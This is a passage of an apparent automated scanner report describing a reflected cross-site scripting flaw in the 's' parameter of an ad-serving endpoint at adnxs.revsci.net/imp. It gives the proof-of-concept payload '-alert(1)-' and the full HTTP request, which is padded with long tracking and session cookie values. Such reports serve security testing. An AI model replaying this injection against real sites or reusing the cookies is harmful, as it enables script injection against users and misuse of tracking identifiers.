rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88Dt+Xr5SMrCaDesP2v1b0OTJJ0SaxGkI/wp7+XJEJqbjRJx9w5bfXe8nwj2VXUacosCwLh4HW1pafBXtBaZ69LF3vwwNiRMOzM2hOzmIl3bkaNEsVIwrzqhtzkLb98whI1TyAiX4VXsMfxBwvwOTN3uNPwEJsPabBxQwHPp5/46LiCCA90/UyINB+lOenc2oXZx7bfxHZuTwOyjdiRgJsP1sXbC6eUwGWzLguW6SsMTBCG1D23QVRFUKOWM85CnTNYMCNXq3or7XEg8u2vvx0Y2vYif8fLD6jUtG/lMREU8yW7iI0DLsTrIFCkrm1kpy6i0cJxPYkHXgOPSTi5CoyeFhnHJRt6fLr+1OVRdX4nuCZzfuQ1VVG5sVtQXpfs93UPetTR+8CjuUaU8qI8jPKp1c+1oFzm2RW+nTi7lTLQCZ+axJebX8rUBsWyiOwvAlEla/ilc0yBK6+tzryJwZMa1HEpun+Puz+CpaUf+Y00G82XdBWMgeDBrpnrxVALpF12tvSNuZhoCA==; rsiPus_bjrC="MLsXtSMNJjhvJZH0ecXcxPALFPJgPeDE7NFqnKkHLx2BmYMObzB9/hpep6V9WP6iKbjeLhnxvCqNxuQAmHiwdDZ+f+xJ0E7g8jzc0DvGDoKVMLvpTHQqNyQHs6Exm0FAA/O2NUr6lEfJ7PQxE4W0VlVk6aXC4v9duVv1shaCwE0LAZ/Bx8Tb5hef+cEj3PLqxCnUQpfvYd7Vmm3clsezaQ3RSUGkvJtHdZ2YTGmaYEJUPbXW9WEH8qQzgpkYeDrPBH1U3bu+gJAgpsWhbrbPB62kbK9yKfTZIckBovzggyzOFwlJow83837Vp38X8J6UZ2pVRtPjL9j/uGFvaLASC9sca4eoyy1DiNYTbqM/IN0HsfsODfE/dlINqck0SuIicSHmxj6EAhObo6wIsaafDGE9dV8TyVXBo9Sr9044Ur/dRo2tn2Xw7pHX6mFkmzpuFbt1ZIR6ORC1hfMXvtKxQ3NpSyty5OFgEYkmuhKYFbFUB72lce0ts/ZWiQjV6smi6UujDfw6Yr0L1vMv1Jsna53BNhbvfJ2B08tqGXAV3vpJiDAtOJ0/CoKAPSG4e1qTnYvsLujwSsgeE/hpOstHVIZFS5jG7vOR0oYtjTMikoHR1Q1hjjKIZ/9TnXzaveyRGvBoaBt4YG3VTFSJEqIUtasV7CnjWTIvnlpWxDjc6OTo8BtlLw60LE4N3KdqbrpN0K7qAy76PhvFFYAgAbaPJNH8dXvCLCIdhJOcvm2UxwBWjcmnMmB5AjZu7tgCyGEuhEEv7sPyRc+T5nVtAYcxwHTY/H6RLgcJ7CdaBewn8gjUDrjMI6OTz2mrv6wPyDuIsIOVptpv8nTZRLacFpfvjcOnWQLZ+kMhecnNRPMgIoh+NU2sUuvyJTKBG9REg/P9a9MerxR8tW3Y5mWuZotrHq0vNX47iVAJI0Xlx0cvhd762Y2mq7CT8Mvbid9AIN5qqjJK1cuiKxnOvWrZ51MnAMQqA5UPUeoEZx75ArW3b7buDiQhQVw4CgF0cjOcMJqDqOQYGsqap8vpmJBWNnS7SbgiYqpXeT1x1s9DnlC0RFkAQsb4wqPPekz6i0ZtPjrDUo+cJIBfL1BlSYKc18etrK/Cg3ZPrZqdvIHp6VzZLOixqOtCKtElY4kh2DEYWEUWzepHNrbkpmEP1ktDcuojdoRfUcr5GE+1F3Q1CBzoV9zdnJC4ggvXN2BBcl1JSbG0P0d6PjNEtyg8il6zrUrZZuCG7fvfb0P4lQLism3igStz5Uq7Fb7O9syCEMy+HjeVUK5zG5tnMi+u5709LXeI/l7kLTEDO4kRaDQ+bD93P+QxIuFerYQ6QQ7QGa+KSvFFqt8uAPd6wMRH2je8EahQprDQTw=="; rsiPus_SZ7X="MLsXtSMNZzhvJZH0ecXcxPALrEtuUCF+EhmSrU9X53YJybh8eM9OR5om4StALLEl9sEMIKnCoBr4ThgQyPsjf9nPZuNEb4EUj7wGDPWNrTVw1j+2QxLF8RWiqhraX7I4lUnumsV/sixRxjRF5rWB9KnHODU3B/yiV30fU5WC6bOj1fDBV0DAs57Y1VM/Rqbb8VtJJSmdPuodbAFaDfdpDm6REm++yUZWODiA1PgSsK1mOBwVrBpyopchY+4OgBAcnNdBu7w/L+p4vkz7xq5Goy6VfiZ0TNBjdPo/v4CQdQttHJakZm+gPoRcnr8XH/OT/ssNoszQO2+/85IsNVqe/S5WX7jFDwYhMvDn5Dt5mB4fbOeHmBd8VRWNeibvCxdfhK2hc22Jnbs9ab301GfTUNS0KHNnyiz21S4XvPj2TGf+ubFq1Kbspi+Iy/u71WjfDeK6UVxhXUFRtNWRI+eAnzZ3LEmi3WB2PXsOqbHWAKKHyRe9v89iY73LDgm+3fBpoycGDWPFK/RsHJeHPSrtr4UAuN95pWG2/nrmDbSKCrywWqPGdlQR9/zVsvELKVta8Kb2hXgRB5SeKT4I8Qvw7LX27/fRNi/bSmgvXKzRe1hUqlRjX6XHPs0QHeDkvFoNHBHR6Ajw/tGbgLmqpOJgUt9o7kPaVvBif5zEnTpsaxS8IFKfcU+dxfWI8/CmxnYNsY7g8GpNG7aJYb9HmVwGkWUX8LwsrPfKf1pgUYxUwW6GC3lsElPdse8nLrO8xk63FbSLMq3mnzxnapoMGv13ssmyiWG7yfcatekVhCSNFYxh0/O4PhyFtH6aFfMTxZfhpvML3RCDz29z37uiFi/eAbIUlpaUtoxGe65dW0XNADXYxLM76mZA6B1NGvgLlNfdq1MdqZhZ2y9FPoHxQfhpPEdXHQHUTX8tS3khPjHiNVKZn/5bhj+gqcGf/oQMfZcoN3Dp6DcfYtghhM0eIgvjfMN0Jve6yZc402lIKLKSKBwrQdy/Ei6zTKKN66pb/n3jAd9a27M0/ZlWlqomT2Hj4S2MhD+z5axkLPP4YCgoRArhJsGijHKrvfElV/1yUCwkwEUibEPkClwAXnsJOoHSPdyZj4n6XfDf0Mr4tvd5wxRldis09GU2b6TQfka5eghlB5Gl9fE0b1lhP2hTperFRqJFCirRGPhW17dFNR5Wk1TQ3YCC9MODW3N3Gn5eOWUW/Csp76CWctZQVuOtFIlMP88TBXkoNgIVYUXxIEcco7/XHOd81bVaWrJMUoW/d6QS+puM+pHyjLbFvsZfXSNj3f20WXBKOIzVpmZism01RaqPJ/SLNkwdY7hUZuYE1k8/V9PjVOfORXn9i6+dDy+w5TA="; rsi_us_1000000="pUMN4y+jOBYULQE0ur/zotBv0OXJiczDnb++8r/x9cboBDwW00GG7hva5IIx81wm4vtfjNktUmVF/5C6yfUn7k+WYUV3ECFN3pSpL8cGgBFDqkHe/o52XtD75xYzoIMRn7E0P7DlipjQz4QNhurmwSlvYpuxNHnaznP/JBCcOyBj4d5DyfgTVB+yyeNMcwEesXWx4Nk8Qln6Z5TvAdsntlk6mho2KcC+ZrzsPFC9Bgxy6qgpCpo5c38/g8Zwj/y35sO9Cnea0pyTEM8/IwG4gPavU+Gn5R7/nu6Mmd7C1OD5YM8jNXNLr9p/3t0ZAddAb7VXBJDm2efT8pu65sl6BoMyCy39MxKe7ZTIj8/0a7oy/QI+Lqq7Dfz4oLs1K7vfflWpyRUq3yHAMvwtSpIV6p730Q+EQVw+ZCzoIXWql+HLUfMh2mNs8YZD/HWET1lYrnDtpSXNlU/w01miBfnq6HIVzALy6lQcnIzrou7iQaYlbN3PINi/YtkLkB+1X09DMXq8Kxya/goLxHfth5ZtoFL2kQEUZaCxqBX6ENJCg0EC6bS+LJ04CK5P9gPctRmM5RIj5Ia9qr29k7uT5Y/x00fSErdDs4qDHTwsbtrFOb9aieSI10oWf7rdt434Cu50GQczE6QI6w2rnb4a3PVo/Q43Y0dEPEFCUIwxuGIpeD+g351hGAFhi0NBE+GqKdjw/aKnLKFftBAw3ZtfGMQLskKAbJ1uA4hWdUkcbUur+n8vJ8KeaY9g+FEiPuysk3UB1EnShP2fO4dI8v8MySVDt/PgQB0SuruCEWgF1oALgpaM9ds+JdiTLxevJ2pKIpAN0TAu4vB7C9+oi8WGl3BFDWADMhB9tEqNLHj+QReqAbblTXO+0Fao4ngfgqrN2TQFWWaOptLA/dMSU2rJJJBd50TeuVH5PIRurXCB/HR+udAw7vZ111gu3we846cnq8NDUohC2mGKIo+MYUANfl7mp1EH9XRY4d7jSWKgqwSFifHcMdiCtT2fJWPdPvf9ott0sj0KAjqvglA2rXRWHEQsY8gh+30uSBg55yo6tLMlQkKts2L9S5Ye1k72Ehgu9xeLwYzfZsZ8xEExAOxLFrE0Snn+O4T1y3iueXECEKftTScXRzpCsyOdAzYhhg4ZTQtujB0mEPD+ELgknFRnQze8DWyOze471+OhcuVoIJUEpjLZbHrxnBqXYBCF5AzK46mfVZ7IY/OVAGlDDGhX1hJ5l6PJudk2D5zc3lCOpAJipzS7S2QnTOBhw6RhMM25pIpmfDDfh/CHU6sZh9LQFR+dgdYZdrbxH3P7wttjQDITcOSaGwHPt86LSHS4PFtBcqpwrGw8Y9ASmBFC5Y/1lvIGCdNhjDmYdy611TnhkKU3WLdh550O2NfVbB7SmXytkIw7EOJMPb7glUobNTFDf57WbY+hkCHaICapIfleMOMzsyXzWmm/r0lEiaiGWlZ6NAKyMzTRzJtSAJJuu8pInHFdzaPdXuCzod3/5ZAYdEo4kyreOwbSeIRuR80/PxHnv+pcUMMmBl9/sQTF7sptNbiMAmrqTX4wXKyLlfn0AZWo5xJ72ILnpIBNat7RXJ7aGJgrJbXgP9b2H3E4/4BNITDrOzrZrr4zm4r+wXAyllqsEeVFu7Az5ZARlmUo0nhL7DbexToJ7NTL6de4VIUXKoB7/OUEJN0CZT2LSez2G3Hgzz0ZZYVLvR2tXfSEmJkeYzwQhsGjPoV5Sjy8APp0TX20ySt6P0ygHXl0keELI3HTra5m7YTEXvH/nW3+wD8Q"

Response

3.21. http://adnxs.revsci.net/imp [s parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adnxs.revsci.net
Path:	/imp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b7cb'-alert(1)-'8d71e6f2ca2 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /imp?Z=300x250&s=14579348b7cb'-alert(1)-'8d71e6f2ca2&r=0&_salt=1248176818&u=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F300x250%2Fatf%3Ft%3D1308241078986%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308241078986&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88Dt+Xr5SMrCaDesP2v1b0OTJJ0SaxGkI/wp7+XJEJqbjRJx9w5bfXe8nwj2VXUacosCwLh4HW1pafBXtBaZ69LF3vwwNiRMOzM2hOzmIl3bkaNEsVIwrzqhtzkLb98whI1TyAiX4VXsMfxBwvwOTN3uNPwEJsPabBxQwHPp5/46LiCCA90/UyINB+lOenc2oXZx7bfxHZuTwOyjdiRgJsP1sXbC6eUwGWzLguW6SsMTBCG1D23QVRFUKOWM85CnTNYMCNXq3or7XEg8u2vvx0Y2vYif8fLD6jUtG/lMREU8yW7iI0DLsTrIFCkrm1kpy6i0cJxPYkHXgOPSTi5CoyeFhnHJRt6fLr+1OVRdX4nuCZzfuQ1VVG5sVtQXpfs93UPetTR+8CjuUaU8qI8jPKp1c+1oFzm2RW+nTi7lTLQCZ+axJebX8rUBsWyiOwvAlEla/ilc0yBK6+tzryJwZMa1HEpun+Puz+CpaUf+Y00G82XdBWMgeDBrpnrxVALpF12tvSNuZhoCA==; rsiPus_bjrC="MLsXtSMNJjhvJZH0ecXcxPALFPJgPeDE7NFqnKkHLx2BmYMObzB9/hpep6V9WP6iKbjeLhnxvCqNxuQAmHiwdDZ+f+xJ0E7g8jzc0DvGDoKVMLvpTHQqNyQHs6Exm0FAA/O2NUr6lEfJ7PQxE4W0VlVk6aXC4v9duVv1shaCwE0LAZ/Bx8Tb5hef+cEj3PLqxCnUQpfvYd7Vmm3clsezaQ3RSUGkvJtHdZ2YTGmaYEJUPbXW9WEH8qQzgpkYeDrPBH1U3bu+gJAgpsWhbrbPB62kbK9yKfTZIckBovzggyzOFwlJow83837Vp38X8J6UZ2pVRtPjL9j/uGFvaLASC9sca4eoyy1DiNYTbqM/IN0HsfsODfE/dlINqck0SuIicSHmxj6EAhObo6wIsaafDGE9dV8TyVXBo9Sr9044Ur/dRo2tn2Xw7pHX6mFkmzpuFbt1ZIR6ORC1hfMXvtKxQ3NpSyty5OFgEYkmuhKYFbFUB72lce0ts/ZWiQjV6smi6UujDfw6Yr0L1vMv1Jsna53BNhbvfJ2B08tqGXAV3vpJiDAtOJ0/CoKAPSG4e1qTnYvsLujwSsgeE/hpOstHVIZFS5jG7vOR0oYtjTMikoHR1Q1hjjKIZ/9TnXzaveyRGvBoaBt4YG3VTFSJEqIUtasV7CnjWTIvnlpWxDjc6OTo8BtlLw60LE4N3KdqbrpN0K7qAy76PhvFFYAgAbaPJNH8dXvCLCIdhJOcvm2UxwBWjcmnMmB5AjZu7tgCyGEuhEEv7sPyRc+T5nVtAYcxwHTY/H6RLgcJ7CdaBewn8gjUDrjMI6OTz2mrv6wPyDuIsIOVptpv8nTZRLacFpfvjcOnWQLZ+kMhecnNRPMgIoh+NU2sUuvyJTKBG9REg/P9a9MerxR8tW3Y5mWuZotrHq0vNX47iVAJI0Xlx0cvhd762Y2mq7CT8Mvbid9AIN5qqjJK1cuiKxnOvWrZ51MnAMQqA5UPUeoEZx75ArW3b7buDiQhQVw4CgF0cjOcMJqDqOQYGsqap8vpmJBWNnS7SbgiYqpXeT1x1s9DnlC0RFkAQsb4wqPPekz6i0ZtPjrDUo+cJIBfL1BlSYKc18etrK/Cg3ZPrZqdvIHp6VzZLOixqOtCKtElY4kh2DEYWEUWzepHNrbkpmEP1ktDcuojdoRfUcr5GE+1F3Q1CBzoV9zdnJC4ggvXN2BBcl1JSbG0P0d6PjNEtyg8il6zrUrZZuCG7fvfb0P4lQLism3igStz5Uq7Fb7O9syCEMy+HjeVUK5zG5tnMi+u5709LXeI/l7kLTEDO4kRaDQ+bD93P+QxIuFerYQ6QQ7QGa+KSvFFqt8uAPd6wMRH2je8EahQprDQTw=="; rsiPus_SZ7X="MLsXtSMNZzhvJZH0ecXcxPALrEtuUCF+EhmSrU9X53YJybh8eM9OR5om4StALLEl9sEMIKnCoBr4ThgQyPsjf9nPZuNEb4EUj7wGDPWNrTVw1j+2QxLF8RWiqhraX7I4lUnumsV/sixRxjRF5rWB9KnHODU3B/yiV30fU5WC6bOj1fDBV0DAs57Y1VM/Rqbb8VtJJSmdPuodbAFaDfdpDm6REm++yUZWODiA1PgSsK1mOBwVrBpyopchY+4OgBAcnNdBu7w/L+p4vkz7xq5Goy6VfiZ0TNBjdPo/v4CQdQttHJakZm+gPoRcnr8XH/OT/ssNoszQO2+/85IsNVqe/S5WX7jFDwYhMvDn5Dt5mB4fbOeHmBd8VRWNeibvCxdfhK2hc22Jnbs9ab301GfTUNS0KHNnyiz21S4XvPj2TGf+ubFq1Kbspi+Iy/u71WjfDeK6UVxhXUFRtNWRI+eAnzZ3LEmi3WB2PXsOqbHWAKKHyRe9v89iY73LDgm+3fBpoycGDWPFK/RsHJeHPSrtr4UAuN95pWG2/nrmDbSKCrywWqPGdlQR9/zVsvELKVta8Kb2hXgRB5SeKT4I8Qvw7LX27/fRNi/bSmgvXKzRe1hUqlRjX6XHPs0QHeDkvFoNHBHR6Ajw/tGbgLmqpOJgUt9o7kPaVvBif5zEnTpsaxS8IFKfcU+dxfWI8/CmxnYNsY7g8GpNG7aJYb9HmVwGkWUX8LwsrPfKf1pgUYxUwW6GC3lsElPdse8nLrO8xk63FbSLMq3mnzxnapoMGv13ssmyiWG7yfcatekVhCSNFYxh0/O4PhyFtH6aFfMTxZfhpvML3RCDz29z37uiFi/eAbIUlpaUtoxGe65dW0XNADXYxLM76mZA6B1NGvgLlNfdq1MdqZhZ2y9FPoHxQfhpPEdXHQHUTX8tS3khPjHiNVKZn/5bhj+gqcGf/oQMfZcoN3Dp6DcfYtghhM0eIgvjfMN0Jve6yZc402lIKLKSKBwrQdy/Ei6zTKKN66pb/n3jAd9a27M0/ZlWlqomT2Hj4S2MhD+z5axkLPP4YCgoRArhJsGijHKrvfElV/1yUCwkwEUibEPkClwAXnsJOoHSPdyZj4n6XfDf0Mr4tvd5wxRldis09GU2b6TQfka5eghlB5Gl9fE0b1lhP2hTperFRqJFCirRGPhW17dFNR5Wk1TQ3YCC9MODW3N3Gn5eOWUW/Csp76CWctZQVuOtFIlMP88TBXkoNgIVYUXxIEcco7/XHOd81bVaWrJMUoW/d6QS+puM+pHyjLbFvsZfXSNj3f20WXBKOIzVpmZism01RaqPJ/SLNkwdY7hUZuYE1k8/V9PjVOfORXn9i6+dDy+w5TA="; rsi_us_1000000="pUMN4y+jOBYULQE0ur/zotBv0OXJiczDnb++8r/x9cboBDwW00GG7hva5IIx81wm4vtfjNktUmVF/5C6yfUn7k+WYUV3ECFN3pSpL8cGgBFDqkHe/o52XtD75xYzoIMRn7E0P7DlipjQz4QNhurmwSlvYpuxNHnaznP/JBCcOyBj4d5DyfgTVB+yyeNMcwEesXWx4Nk8Qln6Z5TvAdsntlk6mho2KcC+ZrzsPFC9Bgxy6qgpCpo5c38/g8Zwj/y35sO9Cnea0pyTEM8/IwG4gPavU+Gn5R7/nu6Mmd7C1OD5YM8jNXNLr9p/3t0ZAddAb7VXBJDm2efT8pu65sl6BoMyCy39MxKe7ZTIj8/0a7oy/QI+Lqq7Dfz4oLs1K7vfflWpyRUq3yHAMvwtSpIV6p730Q+EQVw+ZCzoIXWql+HLUfMh2mNs8YZD/HWET1lYrnDtpSXNlU/w01miBfnq6HIVzALy6lQcnIzrou7iQaYlbN3PINi/YtkLkB+1X09DMXq8Kxya/goLxHfth5ZtoFL2kQEUZaCxqBX6ENJCg0EC6bS+LJ04CK5P9gPctRmM5RIj5Ia9qr29k7uT5Y/x00fSErdDs4qDHTwsbtrFOb9aieSI10oWf7rdt434Cu50GQczE6QI6w2rnb4a3PVo/Q